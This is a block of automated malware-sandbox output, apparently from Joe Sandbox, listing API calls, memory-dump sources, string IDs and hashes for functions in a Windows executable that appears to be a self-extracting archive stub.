                • SetWindowTextW.USER32(?,?), ref: 0088C127
                • _wcsrchr.LIBVCRUNTIME ref: 0088C2B1
                • GetDlgItem.USER32(?,00000066), ref: 0088C2EC
                • SetWindowTextW.USER32(00000000,?), ref: 0088C2FC
                • SendMessageW.USER32(00000000,00000143,00000000,008BA472), ref: 0088C30A
                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0088C335
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                • API String ID: 3564274579-312220925
                • Opcode ID: 54643e6b22df5364499fa4fa1632100fa797f286257682be64858505d2b641b1
                • Instruction ID: 95706bde92148689b8aaed3a2a38bc20dca91e2976b07917359b169937388c0e
                • Opcode Fuzzy Hash: 54643e6b22df5364499fa4fa1632100fa797f286257682be64858505d2b641b1
                • Instruction Fuzzy Hash: 03E16F72D00628AADF25EBA4DC45EEF777CFF18310F0440A6F609E3195EB749A848B61

                Control-flow Graph
                APIs
                • __EH_prolog.LIBCMT ref: 0087D346
                • _wcschr.LIBVCRUNTIME ref: 0087D367
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0087D328,?), ref: 0087D382
                • __fprintf_l.LIBCMT ref: 0087D873
                  • Part of subcall function 0088137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0087B652,00000000,?,?,?,000103EE), ref: 00881396
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                • API String ID: 4184910265-980926923
                • Opcode ID: 80c656e902aba8639b5706a2a8dcaa7d62ff280f3e9c1c98b5d69bca0a1837a8
                • Instruction ID: b21e2d03f651f01be8c3a23dc4ad2ad0c8d6af9863ac55a26ea43548ff20af8e
                • Opcode Fuzzy Hash: 80c656e902aba8639b5706a2a8dcaa7d62ff280f3e9c1c98b5d69bca0a1837a8
                • Instruction Fuzzy Hash: EF12BEB19003199ADF24EBA8CC81BEEB7B5FF04304F148569F619E7295EB70DA40CB65

                Control-flow Graph

                APIs
                  • Part of subcall function 0088AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0088AC85
                  • Part of subcall function 0088AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0088AC96
                  • Part of subcall function 0088AC74: IsDialogMessageW.USER32(000103EE,?), ref: 0088ACAA
                  • Part of subcall function 0088AC74: TranslateMessage.USER32(?), ref: 0088ACB8
                  • Part of subcall function 0088AC74: DispatchMessageW.USER32(?), ref: 0088ACC2
                • GetDlgItem.USER32(00000068,008CECB0), ref: 0088CB6E
                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,0088A632,00000001,?,?,0088AECB,008A4F88,008CECB0), ref: 0088CB96
                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0088CBA1
                • SendMessageW.USER32(00000000,000000C2,00000000,008A35B4), ref: 0088CBAF
                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0088CBC5
                • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0088CBDF
                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0088CC23
                • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0088CC31
                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0088CC40
                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0088CC67
                • SendMessageW.USER32(00000000,000000C2,00000000,008A431C), ref: 0088CC76
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                • String ID: \
                • API String ID: 3569833718-2967466578
                • Opcode ID: cddb0a10b08b3296432a52dbbec577e129bbb1a83ed3faeb0d45a51b54f90b01
                • Instruction ID: 4282e9086399a8a847eaadd9bc5784984f594138eab4150d47a7d9d16de6f6ee
                • Opcode Fuzzy Hash: cddb0a10b08b3296432a52dbbec577e129bbb1a83ed3faeb0d45a51b54f90b01
                • Instruction Fuzzy Hash: BE31C171146752ABE301DF24DC4AFAB7FACFB92704F00061AF651D6291DB645D04C77A

                Control-flow Graph

                APIs
                • ShellExecuteExW.SHELL32(?), ref: 0088CF54
                • ShowWindow.USER32(?,00000000), ref: 0088CF93
                • GetExitCodeProcess.KERNEL32(?,?), ref: 0088CFCF
                • CloseHandle.KERNEL32(?), ref: 0088CFF5
                • ShowWindow.USER32(?,00000001), ref: 0088D084
                  • Part of subcall function 008817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0087BB05,00000000,.exe,?,?,00000800,?,?,008885DF,?), ref: 008817C2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                • String ID: $.exe$.inf
                • API String ID: 3686203788-2452507128
                • Opcode ID: 4a8426b2062a279ad9ae648f61bcb9ca0e23e3cf512182a08a8b7162debd5144
                • Instruction ID: 25264dee300bc5ee8e24109836a2bf332814b7fa5abbab5e220ce36983ca92fd
                • Opcode Fuzzy Hash: 4a8426b2062a279ad9ae648f61bcb9ca0e23e3cf512182a08a8b7162debd5144
                • Instruction Fuzzy Hash: E66119704047809AEB31BF64D804AABBBF5FF95304F04881EF5C5D7299DBB19985CB62

                Control-flow Graph

                APIs
                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00894E35,00894E35,?,?,?,0089A2A9,00000001,00000001,3FE85006), ref: 0089A0B2
                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0089A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0089A138
                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0089A232
                • __freea.LIBCMT ref: 0089A23F
                  • Part of subcall function 00898518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0089C13D,00000000,?,008967E2,?,00000008,?,008989AD,?,?,?), ref: 0089854A
                • __freea.LIBCMT ref: 0089A248
                • __freea.LIBCMT ref: 0089A26D
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ByteCharMultiWide__freea$AllocateHeap
                • String ID:
                • API String ID: 1414292761-0
                • Opcode ID: f6fd6cd06936adfd046c4eee68f8b68ac569cfbf2b790233447164cba618e46b
                • Instruction ID: 1328a08402b029842e56718e1a1581ae99a8d4bc115ebeddebfafb30d70d445f
                • Opcode Fuzzy Hash: f6fd6cd06936adfd046c4eee68f8b68ac569cfbf2b790233447164cba618e46b
                • Instruction Fuzzy Hash: 7951C372610216AFEF29AFA4CC41EBB77AAFB41B54F194629FC05D6180DB35DC40C6E2

                Control-flow Graph

                APIs
                • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,008778AD,?,00000005,?,00000011), ref: 00879A4C
                • GetLastError.KERNEL32(?,?,008778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00879A59
                • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,008778AD,?,00000005,?), ref: 00879A8E
                • GetLastError.KERNEL32(?,?,008778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00879A96
                • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,008778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00879ADB
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: File$CreateErrorLast$Time
                • String ID:
                • API String ID: 1999340476-0
                • Opcode ID: 3aa60259612f29f7380d6fc7d928dabc60e1dfcdf7d5867b1ada37db684a69e6
                • Instruction ID: 60d57d326d8bcf37f4ad42d14d561edfb8e67ef11f11071c09ae3748354c53aa
                • Opcode Fuzzy Hash: 3aa60259612f29f7380d6fc7d928dabc60e1dfcdf7d5867b1ada37db684a69e6
                • Instruction Fuzzy Hash: BD413330544B556FE3208B24CC06BDAFAD4FB02324F104719F6E8D61D1E374E9888B96

                Control-flow Graph

                APIs
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0088AC85
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0088AC96
                • IsDialogMessageW.USER32(000103EE,?), ref: 0088ACAA
                • TranslateMessage.USER32(?), ref: 0088ACB8
                • DispatchMessageW.USER32(?), ref: 0088ACC2
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Message$DialogDispatchPeekTranslate
                • String ID:
                • API String ID: 1266772231-0
                • Opcode ID: 81ad2a9247521b23ce63f238fdedac6b12bc30d87cf4e31104e0cb4d5b12c654
                • Instruction ID: 0abc7fca758fedf83722343334918750996bcd15502e444895e88a96d995eaf9
                • Opcode Fuzzy Hash: 81ad2a9247521b23ce63f238fdedac6b12bc30d87cf4e31104e0cb4d5b12c654
                • Instruction Fuzzy Hash: 28F03071D02129AB9B20ABE2DC4CDEB7F6CFF152517408616F405D2140EB38D905CBB1

                Control-flow Graph

                APIs
                • GetClassNameW.USER32(?,?,00000050), ref: 0088A2DE
                • SHAutoComplete.SHLWAPI(?,00000010), ref: 0088A315
                  • Part of subcall function 008817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0087BB05,00000000,.exe,?,?,00000800,?,?,008885DF,?), ref: 008817C2
                • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0088A305
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AutoClassCompareCompleteFindNameStringWindow
                • String ID: EDIT
                • API String ID: 4243998846-3080729518
                • Opcode ID: 9b39c4fa3eaabc1386bf4ad987d9cbf1f4906c2b79241d1490c9404ce45c7cf5
                • Instruction ID: 8baeb38562f5e23297e0fb51312628edfb3049c4732a7681cbafdfb9c275a99a
                • Opcode Fuzzy Hash: 9b39c4fa3eaabc1386bf4ad987d9cbf1f4906c2b79241d1490c9404ce45c7cf5
                • Instruction Fuzzy Hash: 2EF08232A026287BFB2066649C09F9B776CFB56B10F080157BE05E22C0D7609D45C7F6

                Control-flow Graph

                APIs
                  • Part of subcall function 00880085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008800A0
                  • Part of subcall function 00880085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087EB86,Crypt32.dll,00000000,0087EC0A,?,?,0087EBEC,?,?,?), ref: 008800C2
                • OleInitialize.OLE32(00000000), ref: 0088A34E
                • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0088A385
                • SHGetMalloc.SHELL32(008B8430), ref: 0088A38F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                • String ID: riched20.dll
                • API String ID: 3498096277-3360196438
                • Opcode ID: 54a188dd66e37d4247ae6386009967ac16b8eaec2794c4bb07ca79d9bfba53b8
                • Instruction ID: d892e47862b0dd6481473d428dfb9da8a7342b5da3aa465f7ffeee2ed507c91c
                • Opcode Fuzzy Hash: 54a188dd66e37d4247ae6386009967ac16b8eaec2794c4bb07ca79d9bfba53b8
                • Instruction Fuzzy Hash: B9F03CB1800209ABDB10AF9998499EFFBFCFB95301F00415AE814E2200CBB416058BA1

                Control-flow Graph

                APIs
                • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0088D29D
                • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0088D2D9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: EnvironmentVariable
                • String ID: sfxcmd$sfxpar
                • API String ID: 1431749950-3493335439
                • Opcode ID: 684de7e6cc6155ee7092df0b78d3aca59e59efce6f37fc9386ea590c098f2229
                • Instruction ID: f17ebfe8d379f84c84a15014a68177f76b078ba59872350134d7b794dec29430
                • Opcode Fuzzy Hash: 684de7e6cc6155ee7092df0b78d3aca59e59efce6f37fc9386ea590c098f2229
                • Instruction Fuzzy Hash: 25F0A77280062CA7D7203F959C09ABA7758FF0A751B004051FD48D6642D764DD41D7F1

                Control-flow Graph

                APIs
                • GetStdHandle.KERNEL32(000000F6), ref: 0087985E
                • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00879876
                • GetLastError.KERNEL32 ref: 008798A8
                • GetLastError.KERNEL32 ref: 008798C7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ErrorLast$FileHandleRead
                • String ID:
                • API String ID: 2244327787-0
                • Opcode ID: 25c11f50384bd5f718aa129b5b0b00dfe9a94d5b1e80e1c3c8cc784e2cbcfec3
                • Instruction ID: e7f84c8d38212602875a2d9f08be03bc9ae474f5349d7439e427bf6ca13c3afc
                • Opcode Fuzzy Hash: 25c11f50384bd5f718aa129b5b0b00dfe9a94d5b1e80e1c3c8cc784e2cbcfec3
                • Instruction Fuzzy Hash: 63117C30904608EBEB205B55C804A6977ACFB0B735F10C53AF8AED5A98D735DE409F53
                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,0087CFE0,00000000,00000000,?,0089A49B,0087CFE0,00000000,00000000,00000000,?,0089A698,00000006,FlsSetValue), ref: 0089A526
                • GetLastError.KERNEL32(?,0089A49B,0087CFE0,00000000,00000000,00000000,?,0089A698,00000006,FlsSetValue,008A7348,008A7350,00000000,00000364,?,00899077), ref: 0089A532
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0089A49B,0087CFE0,00000000,00000000,00000000,?,0089A698,00000006,FlsSetValue,008A7348,008A7350,00000000), ref: 0089A540
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID:
                • API String ID: 3177248105-0
                • Opcode ID: c4bd4081f3b9240fbf4e61b1ebbcbfa568c688861dd9d7c6bc29241a166e9191
                • Instruction ID: 02b53402a496d2a7da5963c3e0e0992d30b92a503966b392a80f29aaa929aef6
                • Opcode Fuzzy Hash: c4bd4081f3b9240fbf4e61b1ebbcbfa568c688861dd9d7c6bc29241a166e9191
                • Instruction Fuzzy Hash: E0012B32711626ABDF25ABE89C44A67BB9CFF46BA172A0621F906D3140D731D900C6E1
                APIs
                • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0087CC94,00000001,?,?,?,00000000,00884ECD,?,?,?), ref: 00879F4C
                • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00884ECD,?,?,?,?,?,00884972,?), ref: 00879F8E
                • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0087CC94,00000001,?,?), ref: 00879FB8
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Similarity
                • API ID: FileWrite$Handle
                • String ID:
                • API String ID: 4209713984-0
                • Opcode ID: 54d4a5f6f9e606aa14c1ea54ca581a6f152e0d28d89eb18af75d808d43c44b4a
                • Instruction ID: a6f5c9ed8b8fc6e969a31c3d2534562dde6bcab735f66098cc02691d3c82595a
                • Opcode Fuzzy Hash: 54d4a5f6f9e606aa14c1ea54ca581a6f152e0d28d89eb18af75d808d43c44b4a
                • Instruction Fuzzy Hash: EC31E271208705DBDF148F24D848B6ABBA8FB91711F04895DF98DDA289CB74D948CBB2
                APIs
                • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0087A113,?,00000001,00000000,?,?), ref: 0087A22E
                • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0087A113,?,00000001,00000000,?,?), ref: 0087A261
                • GetLastError.KERNEL32(?,?,?,?,0087A113,?,00000001,00000000,?,?), ref: 0087A27E
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Similarity
                • API ID: CreateDirectory$ErrorLast
                • String ID:
                • API String ID: 2485089472-0
                • Opcode ID: 80fcf414401e69fda72ac55cc77e8a1b391b10f077782394164984e52841d45f
                • Instruction ID: f337be8f6d0b625b7b940eb8545f67a287aad3578a11b677c09931e122e9d4a0
                • Opcode Fuzzy Hash: 80fcf414401e69fda72ac55cc77e8a1b391b10f077782394164984e52841d45f
                • Instruction Fuzzy Hash: 2101F931160518A5EB3A9B784C05BED334DFF57741F08C451F90DE605ACB66CA80C677
                APIs
                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0089B019
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Similarity
                • API ID: Info
                • String ID:
                • API String ID: 1807457897-3916222277
                • Opcode ID: f1a4b62685c64c71c163d517497c283de24cede743d02293d0f5a17b39f537f9
                • Instruction ID: 9a204e9b85812d3f6f12fb611309d5214f52255ab413f02de3ce80c79192a212
                • Opcode Fuzzy Hash: f1a4b62685c64c71c163d517497c283de24cede743d02293d0f5a17b39f537f9
                • Instruction Fuzzy Hash: 4D41257050438C9EDF229A289D94AEABBA9FB45308F1804ECE59AC7142D335AA45CF20
                APIs
                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0089A79D
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Similarity
                • API ID: String
                • String ID: LCMapStringEx
                • API String ID: 2568140703-3893581201
                • Opcode ID: f90a0af0cc641dd2fc2bb1ecd1adf2a8648c7f005f67b0ac8db0d89f87257ce3
                • Instruction ID: e24172b4aec35950db9f1c1066d68dc6e7702a15b746bb28614b7613f53110c7
                • Opcode Fuzzy Hash: f90a0af0cc641dd2fc2bb1ecd1adf2a8648c7f005f67b0ac8db0d89f87257ce3
                • Instruction Fuzzy Hash: 34010232540208BBDF06AFA4DC02EEE7F66FB09714F054114FE14A5260CA368A21AB92
                APIs
                • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00899D2F), ref: 0089A715
                Strings
                • InitializeCriticalSectionEx, xrefs: 0089A6E5
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                Similarity
                • API ID: CountCriticalInitializeSectionSpin
                • String ID: InitializeCriticalSectionEx
                • API String ID: 2593887523-3084827643
                • Opcode ID: 9602937a72707077ff29a6c52ba44ac5b58b7cee2bb0743471e6595077c7b96a
                • Instruction ID: 112b392166cb48f13a632073036befad1a4a40177751aef23f8825d5e652a93d
                • Opcode Fuzzy Hash: 9602937a72707077ff29a6c52ba44ac5b58b7cee2bb0743471e6595077c7b96a
